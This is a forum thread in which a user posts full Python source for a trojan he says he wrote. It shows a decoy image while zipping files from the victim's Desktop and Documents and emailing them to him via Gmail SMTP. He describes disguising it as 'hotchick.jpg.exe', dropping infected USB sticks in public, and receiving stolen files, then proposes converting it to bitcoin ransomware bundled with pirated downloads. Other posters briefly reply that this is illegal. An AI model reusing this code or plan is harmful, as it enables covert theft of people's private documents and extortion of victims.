Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 06-30-2017, 03:54 PM   #1
deonbell
Confirmed User
 
deonbell's Avatar
 
Industry Role:
Join Date: Sep 2015
Posts: 1,045
paywalls for media that take bitcoin?

I want a paywall that takes bitcoin. Let me explain.

found an old program, a little work, maybe $$$?

This is an old program I wrote in python. It opens an image of a cute girl. But, It also zipped your mydocuments and desktop files. And e-mailed them to me.

I compiled with py2exe, I think that is. I set to no console, I set all the library files to hidden. I also compile the program to set the icon of the cute girl. I renamed file to hotchick.jpg.exe (windows ignores the extension by default). I had to change the gmail security settings. I don't know if this will even work anymore. But I installed on 10 usb sticks and dropped them around town.

I got e-mails from 2 out of the 10 computers.

Anyways. I was thinking instead of zipping the files. How about encrypt all the files? And tell users to decrypt they can go to a paywall to get the password, remember payivy? I think they are gone.

Would this be legal? Maybe not ethical, But maybe ethical if I bind with a program on pirate's bay?

Code:
#just playing around with python
import os
import glob
import platform
import zipfile
import sys
import time
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email import Encoders

userhome = os.path.expanduser('~')
desktop = userhome + '/Desktop/'
useros = platform.system()  
distribution = platform.linux_distribution() 


allfileszipped = zipfile.ZipFile('thestuff.zip','w')

#creds
username = 'yourgmailusername'
password = 'yourgmailpassword'


def savefilesoff(folder):
    for foldername,subfolders,filenames in os.walk(folder):
        for filename in filenames:		
		    if filename.endswith((".txt",".xls",".doc")):
			   savefilename = os.path.join(foldername, filename)
			   thefilesize  = os.path.getsize(savefilename)
			   if thefilesize < 500000:
			     allfileszipped.write(savefilename)   
def continueevil():
    savedwd = os.getcwd()
    
    os.chdir(desktop)

    savefilesoff(desktop)
  
  
    userhome = os.path.expanduser('~')
    documents = userhome + '/Documents/'



    os.chdir(documents)
    documentfiles = glob.glob('*.txt')

    savefilesoff(documents)

    
    os.chdir(savedwd)
    allfileszipped.close()
  
    sendfiles()

	
       

def doevil():
  
    continueevil()
        
def sendfiles():
    #send file
    import smtplib
    from email.MIMEMultipart import MIMEMultipart
    from email.MIMEText import MIMEText
    from email.MIMEBase import MIMEBase
    from email import encoders
    
    from_addr = "[email protected]"
    to_addr = "[email protected]"	
	
    msg = MIMEMultipart()
	
    msg['From'] = from_addr
    msg['To'] = to_addr
    msg['Subject'] = "from usb"
	
    body = "here is the file from usb " 
	
    msg.attach(MIMEText(body, 'plain'))
	
    filename = "thestuff.zip"
    savedwd = os.getcwd() 
    attachment = open(savedwd+"/"+filename, "rb")
	
    part = MIMEBase('application', 'octet-stream')
    part.set_payload((attachment).read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
	
    msg.attach(part)
    try: 	
       gserver = smtplib.SMTP("smtp.gmail.com",587)
       gserver.starttls()
       gserver.login(username,password)
       text = msg.as_string()
       gserver.sendmail(from_addr, to_addr, text)
       gserver.quit()
    except:
       print "error on connect"

os.startfile("hotchick.jpg")
savedwd = os.getcwd()
doevil()
os.remove("thestuff.zip")
deonbell is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 06-30-2017, 11:14 PM   #2
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 55,212
this is def not legal
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 06-30-2017, 11:47 PM   #3
onwebcam
Fake Nick 1.0
 
onwebcam's Avatar
 
Industry Role:
Join Date: Oct 2005
Location: Rent free, your head
Posts: 27,652
These days it's best to just post a video on facebook washing a Ferrari and ask people to send you money so they can learn how to wash Ferrari's.
__________________
PLEASE WAIT WHILE BIDEN ADMIN UNINSTALLS ITSELF.....
██████████████████▒ 99.5% complete.
onwebcam is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-01-2017, 02:32 PM   #4
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,064
That is ransomware. Making and distributing is not legal.
__________________
Live Sex Shows
lezinterracial is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks

Tags
import, filename, def, program, files, userhome, mimemultipart, set, file, usb, os.getcwd, savedwd, to_addr, password, encoders, thefilesize, continueevil, ethical, email, python, mimetext, bitcoin, doevil, sendfiles, from_addr



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.